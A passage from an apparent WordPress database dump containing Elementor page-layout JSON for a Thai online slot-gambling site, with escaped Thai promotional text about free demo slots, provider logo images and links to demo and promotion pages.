\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1236,151,'_thumbnail_id','61'),(1240,152,'_elementor_edit_mode','builder'),(1241,152,'_elementor_template_type','wp-page'),(1242,152,'_elementor_version','3.32.5'),(1243,152,'_elementor_pro_version','3.32.3'),(1244,152,'_wp_page_template','default'),(1245,152,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1246,152,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/demoslot\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},